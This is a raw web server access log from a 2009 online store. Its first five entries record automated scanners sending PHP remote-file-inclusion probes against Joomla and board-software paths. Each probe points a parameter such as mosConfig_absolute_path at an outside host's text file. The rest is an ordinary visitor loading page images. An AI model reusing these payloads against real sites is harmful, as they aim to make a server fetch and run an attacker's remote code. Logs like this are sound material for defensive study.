70.85.165.10 - - [12/Jun/2009:01:35:39 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:35:40 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:35:46 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.811"
216.119.103.12 - - [12/Jun/2009:01:35:49 -0400] "GET /logs/access_log.Q108112300//skin/zero_vote/error.php?dir=http://www.cjmc.or.kr/data/board/idscan.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
70.85.165.10 - - [12/Jun/2009:01:36:01 -0400] "GET /logs/access_log.Q109052100//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 292 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:36:01 -0400] "GET /logs/access_log.Q109052100//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 292 "-" "libwww-perl/5.811"
121.169.189.169 - - [12/Jun/2009:01:36:03 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
121.169.189.169 - - [12/Jun/2009:01:36:04 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
121.169.189.169 - - [12/Jun/2009:01:36:04 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
121.169.189.169 - - [12/Jun/2009:01:36:04 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
121.169.189.169 - - [12/Jun/2009:01:36:04 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
121.169.189.169 - - [12/Jun/2009:01:36:04 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
121.169.189.169 - - [12/Jun/2009:01:36:05 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
121.169.189.169 - - [12/Jun/2009:01:36:05 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
121.169.189.169 - - [12/Jun/2009:01:36:05 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
121.169.189.169 - - [12/Jun/2009:01:36:05 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
121.169.189.169 - - [12/Jun/2009:01:36:05 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
121.169.189.169 - - [12/Jun/2009:01:36:05 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
121.169.189.169 - - [12/Jun/2009:01:36:05 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
121.169.189.169 - - [12/Jun/2009:01:36:05 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
